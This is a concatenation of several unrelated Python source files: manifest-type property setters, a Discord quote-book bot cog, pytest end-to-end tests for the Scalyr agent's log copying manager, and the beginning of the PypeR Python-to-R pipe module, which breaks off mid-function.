return self._workflowTemplate
@workflow_template.setter
def workflow_template(self, value):
if not value.manifest['kind'] == "WorkflowTemplate":
self.logger.error("This is not a workflowTemplate")
raise TypeError
self._workflowTemplate=value
@property
def sensor(self):
return self._sensor
@sensor.setter
def sensor(self, value):
if not value.manifest['kind'] == "Sensor":
self.logger.error("This is not a sensor")
raise TypeError
self._sensor=value
@property
def ingress(self):
return self._ingress
@ingress.setter
def ingress(self, value):
if not value.manifest['kind'] == "Ingress":
self.logger.error("This is not a ingress")
raise TypeError
self._ingress=value
@property
def event_source(self):
return self._eventSource
@event_source.setter
def event_source(self, value):
if not value.manifest['kind'] == "EventSource":
self.logger.error("This is not an event source")
raise TypeError
self._eventSource=value
@property
def ingress_url(self):
'''Return Ingress URL'''
return self._ingress_url
@ingress_url.setter
def ingress_url(self, value):
if not isinstance(value, str):
raise TypeError
if not value.startswith("https://"):
self.logger.warning("Ingress url shold start with https://")
self._ingress_url = value
@property
def project(self):
return self._project
@project.setter
def project(self, value):
if not isinstance(value, str):
raise TypeError
if len(value) < 3:
raise ValueError
self._project = value
@property
def name(self):
return self._name
@name.setter
def name(self, value):
if not isinstance(value, str):
raise TypeError
if len(value) < 3:
raise ValueError
self._name = value
@property
def volume_size(self):
return self._volume_size
@volume_size.setter
def volume_size(self, value):
if not isinstance(value, int):
raise TypeError
self._volume_size = value
@property
def uuid(self):
return self._uuid
@uuid.setter
def uuid(self, value):
self._uuid = value
|
import discord
from discord.ext import commands
from discord_slash import cog_ext, SlashContext
import GlobalData
import random
import StringUtils
from LogData import LogAddedQuote
from Aliases import GetAlias
GlobalData.init()
class Quote():
def __init__( self, speaker, text, tags ):
self.speaker = speaker
self.text = text
self.tags = tags
def __repr__( self ):
return self.speaker + ': "' + self.text + '" ' + str( self.tags )
def __str__( self ):
return self.speaker + ': "' + self.text + '" ' + str( self.tags )
def AddTag( self, tag ):
self.tags.append( tag )
def ParseQuotesTxT():
with open( 'Quotes.txt', encoding = "utf-8" ) as f:
print( "" )
print( "Began parsing quote book" )
GlobalData.quoteList.clear()
GlobalData.tagDict.clear()
GlobalData.speakerDict.clear()
GlobalData.sortedSpeakerList.clear()
lines = f.readlines()
# Initialize speaker as an empty string
speaker = ''
for line in lines:
# If line starts with ~ then it's a speaker
if line.startswith('~'):
speaker = ExtractSpeaker( line )
# If line starts with " then it's a quote
elif line.startswith('"'):
tags = ExtractTags( line )
quote = Quote( speaker, ExtractQuote( line ), tags )
AddQuoteToQuoteList( quote )
AddQuoteToTagDict( quote )
AddQuoteToSpeakerData( quote, sortSpeakerList = False )
SortSpeakerList()
print( "Finished parsing quote book" )
print( str( len( GlobalData.quoteList ) ) + " quotes parsed")
print( str( len( GlobalData.tagDict.keys() ) ) + " tags made" )
CalculateSingleQuoteTags()
def AddQuoteToQuoteList( quote ):
GlobalData.quoteList.append( quote )
def AddQuoteToTagDict( quote ):
for tag in quote.tags:
# Add the tag to the dictionary if it isn't already
if tag not in GlobalData.tagDict:
GlobalData.tagDict[tag] = [quote]
# If it is already, then append to build the list of quotes
else:
GlobalData.tagDict[tag].append( quote )
def AddQuoteToSpeakerData( quote, sortSpeakerList : bool = True ):
# Add the speaker to the data structures if it isn't already in them
if quote.speaker not in GlobalData.speakerDict:
GlobalData.speakerDict[ quote.speaker ] = [ quote ]
GlobalData.sortedSpeakerList.append( ( quote.speaker, GlobalData.speakerDict[ quote.speaker ] ) )
# If they are already in, then append to build the list of quotes
else:
GlobalData.speakerDict[ quote.speaker ].append( quote )
if sortSpeakerList:
SortSpeakerList()
def SortSpeakerList():
GlobalData.sortedSpeakerList.sort( key = lambda x: len( x[1] ), reverse = True )
# Assumptions made:
# There will always be a blank line at the start of the quote book
# There will always be a blank line between speaker blocks
def AddQuoteToQuoteBook( speaker, text, additionalTags ):
with open( 'Quotes.txt', 'r+', encoding = "utf-8" ) as f:
contents = f.readlines()
insertLineIndex = None
makeNewSpeaker = True
for index, line in enumerate( contents ):
if line.startswith('~'):
currSpeaker = ExtractSpeaker( line )
if speaker.lower() == currSpeaker.lower():
makeNewSpeaker = False
elif speaker.lower() < currSpeaker.lower():
insertLineIndex = index - 1
break
message = ""
if makeNewSpeaker:
message = "\n~" + speaker + ":\n"
message += '"' + text + '"'
if additionalTags:
message += " " + additionalTags
message += "\n"
if insertLineIndex != None:
contents.insert( insertLineIndex, message )
else:
contents.append( message )
f.seek(0)
f.writelines( contents )
def CalculateSingleQuoteTags():
# WIll calculate tags that only have one quote associated with them
tagsWithOneQuote = []
for tag in GlobalData.tagDict.keys():
if len( GlobalData.tagDict[ tag ] ) == 1:
#print( tag + " " + str( GlobalData.tagDict[ tag ][0] ) )
tagsWithOneQuote.append( ( tag, str( GlobalData.tagDict[ tag ][0] ) ) )
print("")
print( str( len( tagsWithOneQuote ) ) + " tags have only one quote" )
chosenTags = random.sample( tagsWithOneQuote, 3)
print( "Randomly chosen one tag quotes:")
for tag in chosenTags:
print( tag[0] + " - " + str( tag[1] ) )
# Formatted with a ~ at the beginning and a : at the end
# ~Speaker:
def ExtractSpeaker( line ):
start = line.find("~") + len("~")
end = line.rindex(":")
return line[start:end]
# Quotes are formatted between two quotation marks
# Additional tags can be placed at the end to give the quote additional context
# "This is a quote" And these are more tags
def ExtractTags( line ):
newStr = StringUtils.StandardizeString( line )
tagList = newStr.split()
tagList = StringUtils.CutCommonWords( tagList )
tagList = StringUtils.RemoveSuffixes( tagList )
return tagList
def ExtractQuote( line ):
start = line.find('"') + len('"')
end = line.rindex('"')
return line[start:end]
class ParseQuotesCog( commands.Cog ):
def __init__( self, bot ):
self.bot = bot
@cog_ext.cog_slash( name = "reloadquotes", guild_ids = GlobalData.guildIDList )
async def _reloadquotes( self, ctx: SlashContext ):
await ctx.defer()
if ctx.author_id not in GlobalData.guildData[ ctx.guild_id ][ 'authorizedUsers' ]:
await ctx.send( "You are not authorized to use this command" )
return
print("\nReloading quotes")
ParseQuotesTxT()
await ctx.send( "Reloading quotes!" )
@cog_ext.cog_slash( name = "addquote", guild_ids = GlobalData.guildIDList )
async def _addquote( self, ctx: SlashContext, speaker : str, text : str, tags : str = "" ):
aliasedSpeaker = GetAlias( speaker )
addNewSpeaker = False
previousLeaderboardIndex = -1
if aliasedSpeaker in GlobalData.speakerDict.keys():
# Check if the quote is already in the quote book
for quote in GlobalData.speakerDict[ aliasedSpeaker ]:
if text.lower() == quote.text.lower():
await ctx.send( "That quote is already in the quote book!")
return
# Find the current leaderboard index
for index, speaker in enumerate( GlobalData.sortedSpeakerList ):
if speaker[0] == aliasedSpeaker:
previousLeaderboardIndex = index
break
if previousLeaderboardIndex == -1:
print( "ERROR! somehow could not find " + aliasedSpeaker + " inside the leaderboard when /addquote")
# The speaker we want to add does not exist in the quote book
else:
addNewSpeaker = True
# Construct the quote object
extractedTags = ExtractTags( text ) + ExtractTags( tags )
quote = Quote( aliasedSpeaker, text, extractedTags )
await ctx.defer()
print( "\n" + ctx.author.name + " Wanted to add " + str( quote ) )
# Add the quote object to the interal data structures
AddQuoteToQuoteList( quote )
AddQuoteToTagDict( quote )
AddQuoteToSpeakerData( quote )
AddQuoteToQuoteBook( aliasedSpeaker, text, tags )
LogAddedQuote( quote, ctx.author.name )
# Find the current leaderboard index
currLeaderboardIndex = -1
for index, speaker in enumerate( GlobalData.sortedSpeakerList ):
if speaker[0] == aliasedSpeaker:
currLeaderboardIndex = index
break
if currLeaderboardIndex == -1:
print( "ERROR! somehow could not find " + aliasedSpeaker + " inside the leaderboard when /addquote")
message = "Successfully added " + str( quote ) + "\n"
if addNewSpeaker:
message += "Added a new speaker: " + aliasedSpeaker
else:
if currLeaderboardIndex < previousLeaderboardIndex:
message += ":tada: " + aliasedSpeaker + " moved up to " + str( currLeaderboardIndex + 1 ) + " position! :tada:"
await ctx.send( message )
@cog_ext.cog_slash( name = "say", guild_ids = GlobalData.guildIDList )
async def _say( self, ctx: SlashContext, text : str, channel ):
await ctx.defer()
if ctx.author_id not in GlobalData.guildData[ ctx.guild_id ][ 'authorizedUsers' ]:
await ctx.send( "You are not authorized to use this command" )
return
await GlobalData.bot.get_channel( channel ).send( text )
await ctx.send( "Message sent!" )
def setup(bot):
bot.add_cog( ParseQuotesCog(bot) ) |
# Copyright 2014 Scalyr Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ------------------------------------------------------------------------
#
# author: <NAME> <<EMAIL>>
#
# Those test just the same test from previos copying manager, but adapted to the new copying manager.
#
from __future__ import unicode_literals
from __future__ import absolute_import
from io import open
__author__ = "<EMAIL>"
import sys
import logging
import platform
import os
import re
import pytest
root = logging.getLogger()
root.setLevel(logging.DEBUG)
ch = logging.StreamHandler(sys.stdout)
ch.setLevel(logging.DEBUG)
formatter = logging.Formatter("%(asctime)s - %(name)s - %(levelname)s - %(message)s")
ch.setFormatter(formatter)
root.addHandler(ch)
from scalyr_agent import scalyr_init
from scalyr_agent import util as scalyr_util
scalyr_init()
from scalyr_agent import scalyr_logging
from tests.unit.copying_manager_tests.copying_manager_new_test import CopyingManagerTest
log = scalyr_logging.getLogger(__name__)
log.setLevel(scalyr_logging.DEBUG_LEVEL_5)
import six
def pytest_generate_tests(metafunc):
"""
Run all tests for each configuration.
"""
if "worker_type" in metafunc.fixturenames:
test_params = [["thread", 1, 1], ["thread", 2, 2]]
# if the OS is not Windows and python version > 2.7 then also do the multiprocess workers testing.
if platform.system() != "Windows" and sys.version_info >= (2, 7):
test_params.extend([["process", 1, 1], ["process", 2, 2]])
metafunc.parametrize(
"worker_type, workers_count, worker_sessions_count", test_params
)
def _add_non_utf8_to_checkpoint_file(path):
"""
Add a unicode character to the checkpoint data stored in file located in "path"
"""
fp = open(path, "r")
data = scalyr_util.json_decode(fp.read())
fp.close()
# 2-> TODO json libraries do not allow serialize bytes string with invalid UTF-8(ujson)or even bytes in general(json).
# so to test this case we must write non-utf8 byte directly, without serializing.
# this string will be replaced with invalid utf8 byte after encoding.
data["test"] = "__replace_me__"
json_string = scalyr_util.json_encode(data, binary=True)
# replace prepared substring to invalid byte.
json_string = json_string.replace(b"__replace_me__", b"\x96")
fp = open(path, "wb")
fp.write(json_string)
fp.close()
def _write_bad_checkpoint_file(path):
"""
Write invalid JSON in file located in "path"
"""
fp = open(path, "w")
fp.write(scalyr_util.json_encode("}data{,:,,{}"))
fp.close()
class TestCopyingManagerEnd2End(CopyingManagerTest):
"""
Initially, those tests were created for the unittest library,
and they are were ported to work on pytest in order to be able to parametrize them to run tests for different
copying manager configurations, such as muti-worker, multi-process workers.
"""
# TODO: Remove those methods and rewrite in pytest style.
# region Those methods are needed to port unittest functions
def __create_test_instance(
self, root_dir=None, auto_start=True, use_pipelining=False
):
if root_dir:
files_number = None
else:
files_number = 1
files, manager = self._init_manager(
files_number, auto_start=auto_start, use_pipelining=use_pipelining
)
self._manager = manager
if root_dir:
return manager
self._log_file1 = files[0]
self.__test_log_file = self._log_file1.str_path
self._config = self._env_builder.config
return manager
def __append_log_lines(self, *lines):
self._log_file1.append_lines(*lines)
def __extract_lines(self, request):
return self._extract_lines(request)
def assertEquals(self, expected, actual):
assert expected == actual
def assertTrue(self, expr):
assert expr
def assertFalse(self, expr):
assert not expr
def _file_contains_regex(self, file_path, expression):
matcher = re.compile(expression)
with open(file_path, "r") as fp:
content = fp.read()
return bool(matcher.search(content))
def assertLogFileDoesntContainsRegex(self, expression, file_path_or_glob):
"""
Custom assertion function which asserts that the provided log file path doesn't contain a
string which matches the provided regular expression.
This function performs checks against the whole file content which means it comes handy in
scenarios where you need to perform cross line checks.
:param file_path_or_glob: Path or glob.
"""
file_paths = scalyr_util.match_glob(file_path_or_glob)
for file_path in file_paths:
if self._file_contains_regex(file_path=file_path, expression=expression):
with open(file_path, "r") as fp:
content = fp.read()
self.__assertion_failed = True
pytest.fail(
'File "%s" contains "%s" expression, but it shouldn\'t.\n\nActual file content: %s'
% (file_path, expression, content)
)
def assertLogFileContainsRegex(self, expression, file_path_or_glob):
"""
Custom assertion function which asserts that the provided log file path contains a string
which matches the provided regular expression.
This function performs checks against the whole file content which means it comes handy in
scenarios where you need to perform cross line checks.
:param expression: Regular expression to match against the whole file content.
:param file_path_or_glob: Path or glob
"""
file_paths = scalyr_util.match_glob(file_path_or_glob)
for file_path in file_paths:
if self._file_contains_regex(file_path=file_path, expression=expression):
break
else:
pytest.fail(
'File "%s" does not contain "%s" expression.'
% (file_path_or_glob, expression)
)
# endregion
def test_single_log_file(self):
manager = self.__create_test_instance()
self.__append_log_lines("First line", "Second line")
(request, responder_callback) = manager.wait_for_rpc()
lines = self.__extract_lines(request)
self.assertEquals(2, len(lines))
self.assertEquals("First line", lines[0])
self.assertEquals("Second line", lines[1])
responder_callback("success")
def test_multiple_scans_of_log_file(self):
controller = self.__create_test_instance()
self.__append_log_lines("First line", "Second line")
(request, responder_callback) = controller.wait_for_rpc()
lines = self.__extract_lines(request)
self.assertEquals(2, len(lines))
self.assertEquals("First line", lines[0])
self.assertEquals("Second line", lines[1])
responder_callback("success")
self.__append_log_lines("Third line")
(request, responder_callback) = controller.wait_for_rpc()
lines = self.__extract_lines(request)
self.assertEquals(1, len(lines))
self.assertEquals("Third line", lines[0])
def test_normal_error(self):
controller = self.__create_test_instance()
self.__append_log_lines("First line", "Second line")
(request, responder_callback) = controller.wait_for_rpc()
lines = self.__extract_lines(request)
self.assertEquals(2, len(lines))
self.assertEquals("First line", lines[0])
self.assertEquals("Second line", lines[1])
responder_callback("error")
self.__append_log_lines("Third line")
(request, responder_callback) = controller.wait_for_rpc()
lines = self.__extract_lines(request)
self.assertEquals(2, len(lines))
self.assertEquals("First line", lines[0])
self.assertEquals("Second line", lines[1])
def test_drop_request_due_to_error(self):
controller = self.__create_test_instance()
self.__append_log_lines("First line", "Second line")
(request, responder_callback) = controller.wait_for_rpc()
lines = self.__extract_lines(request)
self.assertEquals(2, len(lines))
self.assertEquals("First line", lines[0])
self.assertEquals("Second line", lines[1])
responder_callback("discardBuffer")
self.__append_log_lines("Third line")
(request, responder_callback) = controller.wait_for_rpc()
lines = self.__extract_lines(request)
self.assertEquals(1, len(lines))
self.assertEquals("Third line", lines[0])
def test_request_too_large_error(self):
controller = self.__create_test_instance()
self.__append_log_lines("First line", "Second line")
(request, responder_callback) = controller.wait_for_rpc()
lines = self.__extract_lines(request)
self.assertEquals(2, len(lines))
self.assertEquals("First line", lines[0])
self.assertEquals("Second line", lines[1])
responder_callback("requestTooLarge")
self.__append_log_lines("Third line")
(request, responder_callback) = controller.wait_for_rpc()
lines = self.__extract_lines(request)
self.assertEquals(3, len(lines))
self.assertEquals("First line", lines[0])
self.assertEquals("Second line", lines[1])
self.assertEquals("Third line", lines[2])
def test_pipelined_requests(self):
if self.worker_sessions_count * self.workers_count > 1:
pytest.skip("This test works only on one worker configuration.")
controller = self.__create_test_instance(use_pipelining=True)
self.__append_log_lines("First line", "Second line")
controller.perform_scan()
self.__append_log_lines("Third line")
controller.perform_pipeline_scan()
(request, responder_callback) = controller.wait_for_rpc()
self.assertFalse(self.__was_pipelined(request))
lines = self.__extract_lines(request)
self.assertEquals(2, len(lines))
self.assertEquals("First line", lines[0])
self.assertEquals("Second line", lines[1])
responder_callback("success")
(request, responder_callback) = controller.wait_for_rpc()
self.assertTrue(self.__was_pipelined(request))
lines = self.__extract_lines(request)
self.assertEquals(1, len(lines))
self.assertEquals("Third line", lines[0])
responder_callback("success")
def test_pipelined_requests_with_normal_error(self):
if self.worker_sessions_count * self.workers_count > 1:
pytest.skip("This test works only on one worker configuration.")
controller = self.__create_test_instance(use_pipelining=True)
self.__append_log_lines("First line", "Second line")
controller.perform_scan()
self.__append_log_lines("Third line")
controller.perform_pipeline_scan()
(request, responder_callback) = controller.wait_for_rpc()
self.assertFalse(self.__was_pipelined(request))
lines = self.__extract_lines(request)
self.assertEquals(2, len(lines))
self.assertEquals("First line", lines[0])
self.assertEquals("Second line", lines[1])
responder_callback("error")
(request, responder_callback) = controller.wait_for_rpc()
self.assertFalse(self.__was_pipelined(request))
lines = self.__extract_lines(request)
self.assertEquals(2, len(lines))
self.assertEquals("First line", lines[0])
self.assertEquals("Second line", lines[1])
responder_callback("success")
(request, responder_callback) = controller.wait_for_rpc()
self.assertTrue(self.__was_pipelined(request))
lines = self.__extract_lines(request)
self.assertEquals(1, len(lines))
self.assertEquals("Third line", lines[0])
responder_callback("success")
def test_pipelined_requests_with_retry_error(self):
if self.worker_sessions_count * self.workers_count > 1:
pytest.skip("This test works only on one worker configuration.")
controller = self.__create_test_instance(use_pipelining=True)
self.__append_log_lines("First line", "Second line")
controller.perform_scan()
self.__append_log_lines("Third line")
controller.perform_pipeline_scan()
(request, responder_callback) = controller.wait_for_rpc()
self.assertFalse(self.__was_pipelined(request))
lines = self.__extract_lines(request)
self.assertEquals(2, len(lines))
self.assertEquals("First line", lines[0])
self.assertEquals("Second line", lines[1])
responder_callback("requestTooLarge")
(request, responder_callback) = controller.wait_for_rpc()
self.assertFalse(self.__was_pipelined(request))
lines = self.__extract_lines(request)
self.assertEquals(3, len(lines))
self.assertEquals("First line", lines[0])
self.assertEquals("Second line", lines[1])
self.assertEquals("Third line", lines[2])
responder_callback("success")
def test_start_from_full_checkpoint(self):
controller = self.__create_test_instance()
previous_root_dir = os.path.dirname(self.__test_log_file)
self.__append_log_lines("First line", "Second line")
(request, responder_callback) = controller.wait_for_rpc()
lines = self.__extract_lines(request)
self.assertEquals(2, len(lines))
self.assertEquals("First line", lines[0])
self.assertEquals("Second line", lines[1])
# stop thread on manager to write checkouts to file.
controller.stop_manager()
# write some new lines to log.
self.__append_log_lines("Third line", "Fourth line")
# Create new copying manager, but passing previous directory with same log and checkouts.
# Also starting it manually, to not miss the first "SENDING" state.
controller = self.__create_test_instance(
root_dir=previous_root_dir, auto_start=False
)
self._manager.start_manager()
(request, responder_callback) = controller.wait_for_rpc()
lines = self.__extract_lines(request)
# thread should continue from saved checkpoint
self.assertEquals(2, len(lines))
self.assertEquals("Third line", lines[0])
self.assertEquals("Fourth line", lines[1])
# stopping one more time, but now emulating that checkpoint files are stale.
controller.stop_manager()
# This lines should be skipped by copying manager.
self.__append_log_lines("Fifth line", "Sixth line")
# shift time on checkpoint files to make it seem like the checkpoint was written in the past.
for worker in self._manager.worker_sessions:
(
checkpoints,
active_chp,
) = worker.get_checkpoints()
checkpoints["time"] -= self._config.max_allowed_checkpoint_age + 1
active_chp["time"] -= self._config.max_allowed_checkpoint_age + 1
worker.write_checkpoints(worker.get_checkpoints_path(), checkpoints)
worker.write_checkpoints(worker.get_active_checkpoints_path(), active_chp)
# also shift time in the consolidated checkpoint file.
checkpoints = self._manager.consolidated_checkpoints
checkpoints["time"] -= self._config.max_allowed_checkpoint_age + 1
self._manager.write_consolidated_checkpoints(checkpoints)
# create and manager.
controller = self.__create_test_instance(
root_dir=previous_root_dir, auto_start=False
)
self._manager.start_manager()
# We are expecting that copying manager has considered checkpoint file as stale,
# and has skipped "fifth" and "sixth" lines.
(request, responder_callback) = controller.wait_for_rpc()
lines = self.__extract_lines(request)
self.assertEquals(0, len(lines))
def test_start_from_active_checkpoint(self):
controller = self.__create_test_instance()
previous_root_dir = os.path.dirname(self.__test_log_file)
self.__append_log_lines("First line", "Second line")
(request, responder_callback) = controller.wait_for_rpc()
lines = self.__extract_lines(request)
self.assertEquals(2, len(lines))
self.assertEquals("First line", lines[0])
self.assertEquals("Second line", lines[1])
controller.stop_manager()
# remove the checkpoints file, which should be only one,
# because it has to clean all other files on stop. From this moment, all checkpoint states are removed
os.remove(os.path.join(self._config.agent_data_path, "checkpoints.json"))
# "active_checkpoints" file is used if it is newer than "full_checkpoints",
# so we read "full_checkpoints" ...
for worker in self._manager.worker_sessions:
checkpoints, active_checkpoints = worker.get_checkpoints()
# ... and make bigger(fresher) time value for "active_checkpoints".
active_checkpoints["time"] = checkpoints["time"] + 1
worker.write_checkpoints(worker.get_checkpoints_path(), checkpoints)
worker.write_checkpoints(
worker.get_active_checkpoints_path(), active_checkpoints
)
self.__append_log_lines("Third line", "Fourth line")
controller = self.__create_test_instance(
root_dir=previous_root_dir, auto_start=False
)
self._manager.start_manager()
(request, responder_callback) = controller.wait_for_rpc()
lines = self.__extract_lines(request)
self.assertEquals(2, len(lines))
self.assertEquals("Third line", lines[0])
self.assertEquals("Fourth line", lines[1])
def test_start_without_active_checkpoint(self):
controller = self.__create_test_instance()
previous_root_dir = os.path.dirname(self.__test_log_file)
self.__append_log_lines("First line", "Second line")
(request, responder_callback) = controller.wait_for_rpc()
lines = self.__extract_lines(request)
self.assertEquals(2, len(lines))
self.assertEquals("First line", lines[0])
self.assertEquals("Second line", lines[1])
controller.stop_manager()
self.__append_log_lines("Third line", "Fourth line")
# remove the checkpoints file, which should be only one,
# because it has to clean all other files on stop. From this moment, all checkpoint states are removed
os.remove(os.path.join(self._config.agent_data_path, "checkpoints.json"))
for worker in self._manager.worker_sessions:
# get preserved checkpoints from workers and write them ones more.
# we do not write active-checkpoints because it is the purpose of this test.
checkpoints, _ = worker.get_checkpoints()
worker.write_checkpoints(worker.get_checkpoints_path(), checkpoints)
controller = self.__create_test_instance(
root_dir=previous_root_dir, auto_start=False
)
self._manager.start_manager()
(request, responder_callback) = controller.wait_for_rpc()
lines = self.__extract_lines(request)
self.assertEquals(2, len(lines))
self.assertEquals("Third line", lines[0])
self.assertEquals("Fourth line", lines[1])
def test_start_with_bad_checkpoint(self):
# Check totally mangled checkpoint file in the form of invalid JSON, should be treated as not having one at all
controller = self.__create_test_instance()
previous_root_dir = os.path.dirname(self.__test_log_file)
self.__append_log_lines("First line", "Second line")
(request, responder_callback) = controller.wait_for_rpc()
lines = self.__extract_lines(request)
self.assertEquals(2, len(lines))
self.assertEquals("First line", lines[0])
self.assertEquals("Second line", lines[1])
controller.stop_manager()
self.__append_log_lines("Third line", "Fourth line")
_write_bad_checkpoint_file(str(controller.consolidated_checkpoints_path))
controller = self.__create_test_instance(
root_dir=previous_root_dir, auto_start=False
)
self._manager.start_manager()
(request, responder_callback) = controller.wait_for_rpc()
lines = self.__extract_lines(request)
# In the case of a bad checkpoint file, the agent should just pretend the checkpoint file does not exist and
# start reading the logfiles from the end. In this case, that means lines three and four will be skipped.
self.assertEquals(0, len(lines))
def test_start_with_non_utf8_checkpoint(self):
# Check checkpoint file with invalid UTF-8 in it, should be treated the same as not having one at all
controller = self.__create_test_instance()
previous_root_dir = os.path.dirname(self.__test_log_file)
self.__append_log_lines("First line", "Second line")
(request, responder_callback) = controller.wait_for_rpc()
lines = self.__extract_lines(request)
self.assertEquals(2, len(lines))
self.assertEquals("First line", lines[0])
self.assertEquals("Second line", lines[1])
controller.stop_manager()
self.__append_log_lines("Third line", "Fourth line")
_add_non_utf8_to_checkpoint_file(str(controller.consolidated_checkpoints_path))
controller = self.__create_test_instance(
root_dir=previous_root_dir, auto_start=False
)
self._manager.start_manager()
(request, responder_callback) = controller.wait_for_rpc()
lines = self.__extract_lines(request)
# In the case of a bad checkpoint file, the agent should just pretend the checkpoint file does not exist and
# start reading the logfiles from the end. In this case, that means lines three and four will be skipped.
self.assertEquals(0, len(lines))
def test_generate_status(self):
controller = self.__create_test_instance()
self.__append_log_lines("First line", "Second line")
(request, responder_callback) = controller.wait_for_rpc()
lines = self.__extract_lines(request)
self.assertEquals(2, len(lines))
self.assertEquals("First line", lines[0])
self.assertEquals("Second line", lines[1])
status = self._manager.generate_status()
self.assertEquals(
self._env_builder.MAX_NON_GLOB_TEST_LOGS + 1, len(status.log_matchers)
)
all_log_processors = {}
# chech if each log file has its own log processor.
for api_key_status in status.workers:
for worker_status in api_key_status.sessions:
for processor_status in worker_status.log_processors:
all_log_processors[processor_status.log_path] = processor_status
for test_log in self._env_builder.current_test_log_files:
assert test_log.str_path in all_log_processors
def test_logs_initial_positions(self):
controller = self.__create_test_instance(
auto_start=False,
)
self.__append_log_lines(*"0123456789")
# Start copying manager from 10 bytes offset.
self._manager.start_manager(
logs_initial_positions={self.__test_log_file: 5 * 2},
)
request, cb = controller.wait_for_rpc()
lines = self.__extract_lines(request)
self.assertEquals(["5", "6", "7", "8", "9"], lines)
def test_whole_response_is_logged_on_non_success(self):
statuses = ["discardBuffer", "requestTooLarge", "parseResponseFailed"]
self._init_test_environment()
for status in statuses:
# Initially this long line shouldn't be present
expected_body = (
'Received server response with status="%s" and body: fake' % (status)
)
self.assertLogFileDoesntContainsRegex(
expected_body,
file_path_or_glob=os.path.join(
six.text_type(self._env_builder.agent_logs_path), "agent.*log"
),
)
controller = None
try:
controller = self.__create_test_instance()
self.__append_log_lines("First line", "Second line")
(request, responder_callback) = controller.wait_for_rpc()
lines = self.__extract_lines(request)
self.assertEquals(2, len(lines))
self.assertEquals("First line", lines[0])
self.assertEquals("Second line", lines[1])
responder_callback(status)
# But after response is received, it should be present
expected_body = (
'Received server response with status="%s" and body: fake'
% (status)
)
self.assertLogFileContainsRegex(
expected_body,
file_path_or_glob=os.path.join(
six.text_type(self._env_builder.agent_logs_path),
"agent*_debug.log",
),
)
finally:
if controller:
controller.stop_manager()
def __was_pipelined(self, request):
return "pipelined=1.0" in request[0].get_timing_data()
class FakeMonitor(object):
def __init__(self, monitor_log_config):
self.module_name = "fake_monitor"
self.log_config = monitor_log_config
def set_log_watcher(self, log_watcher):
pass
def get_extra_server_attributes(self):
return None
class FakeMonitor1(object):
order = 0
def __init__(self, monitor_log_config, id=None, attribute_key="extra_attrib"):
self.id = id
self.module_name = "fake_monitor_%s" % id
self.log_config = monitor_log_config
self.access_order = None
self.attribute_key = attribute_key
def set_log_watcher(self, log_watcher):
pass
@property
def attribute_value(self):
return "VALUE_%s" % self.id
def get_extra_server_attributes(self):
self.access_order = FakeMonitor1.order
FakeMonitor1.order += 1
return {self.attribute_key: self.attribute_value}
|
#!/usr/bin/env python
'''
PypeR (PYthon-piPE-R)
PypeR is free software subjected to the GPL license 3.0. and comes with
ABSOLUTELY NO WARRANT. This package provides a light-weight interface to use R
in Python by pipe. It can be used on multiple platforms since it is written in
pure python.
Prerequisites:
1. Python 2.3 or later is required.
Usage:
The usage of this packages is very simple. Examples are presented in the
file "test.py" in the distribution package.
PypeR provide a class "R" to wrap the R language. An instance of the R
class is used to manage an R process. Different instances can use different
R installations. On POSIX systems (including the Cygwin environment on
Windows), it is even possible to use an R installed on a remote computer.
Basicly, there are four ways to use an instance of the R class.
1. Use the methods of the instance
methods include:
run:This method is used to pass an R command string to the R process,
the return value is a string - the standard output from R. Note
that the return value usually includes the R expression (a
series of R codes) themselves and the output of the R
expression. If the real result value is wanted, use the
function "get" instead.
assign: Assign a value to an R variable. No return value.
get: Get the result of an R expression.
remove: Remove a R variable.
2. Call the instance as a function
The instance is callable. If called as a function, it behaves just
same as its "run" method.
3. Use the instance as a Python dictionary
The instance can mimic some operations on a python dictionary,
typically, to assign values to R variables, to retrieve values for any
R expression, or delete an R variable. These two operations do same
jobs as the methods "assign", "get", and "remove".
4. Access R variables as if they are the attributes of the instance.
If the variable name cannot be found in the instance or its class, the
instance will try to get/set/remove it in R. This way is similar to 3,
but with more limitations, e.g., the R variable name cannot contain any
DOT (.)
Considering that any code block in R is an expression, the "get" method (or
the form of retrieving values from a dictionary) can be used to run a
number of R commands with the final result returned.
Note that PypeR do NOT validate/convert a variable name when pass it to R.
If a variable name with a leading underscore ("_"), although it legal in
python, is passed to R, an RError will be raised.
Conversions:
Python -> R
None -> NULL, NaN -> NaN, Inf -> Inf
R -> Python (numpy)
NULL -> None, NA -> None, NaN -> None (NaN), Inf -> None (Inf)
DEBUG model:
Since the child process (R) can be easily killed by any ocassional error in
the codes passed to it, PypeR is set to "DEBUG" model by default. This
means that any code blocks send to R will be wrapped in the function
"try()", which will prevent R from crashing. To disable the "DEBUG" model,
the user can simple set the variable "_DEBUG_MODE" in the R class or in its
instance to False.
To model the behavior of the "get" method of a Python dictionary, the
method "get" allows wild values for variables that does not exists in R.
Then the R expression will always be wrapped in "try()" to avoid R crashing
if the method "get" is called.
'''
# the module "subprocess" requires Python 2.4
import os
import sys
import time
import re
import tempfile
from types import *
__version__ = '1.1.2'
if sys.version < '2.3': # actually python >= 2.3 is required by tempfile.mkstemp used in this module !!!
set = frozenset = tuple
basestring = str
elif sys.version < '2.4':
from sets import Set as set, ImmutableSet as frozenset
if sys.version < '3.0':
_mystr = _mybytes = lambda s: s
_in_py3 = False
else:
from functools import reduce
long, basestring, unicode = int, str, str
_mybytes = lambda s: bytes(s, 'utf8') # 'ascii')
_mystr = lambda s: str(s, 'utf8')
_in_py3 = True
try:
import pandas
has_pandas = True
except:
has_pandas = False
try:
import numpy
has_numpy = True
except:
has_numpy = False
_has_subp = False
if sys.platform == 'cli': # for IronPython
from System.Diagnostics import Process
PIPE, _STDOUT = None, None
def Popen(CMD, *a, **b):
'''
CMD is a list - a command and its arguments
'''
p = Process()
p.StartInfo.UseShellExecute = False
p.StartInfo.RedirectStandardInput = True
p.StartInfo.RedirectStandardOutput = True
p.StartInfo.RedirectStandardError = True
p.StartInfo.FileName = CMD[0]
p.StartInfo.Arguments = ' '.join(CMD[1:])
p.Start()
return(p)
def sendAll(p, s):
# remove ending newline since WriteLine will add newline at the end of s!
if s.endswith('\r\n'):
s = s[:-2]
elif s.endswith('\n'):
s = s[:-1]
p.StandardInput.WriteLine(_mybytes(s))
def readLine(p, dump_stdout=False, *a, **b):
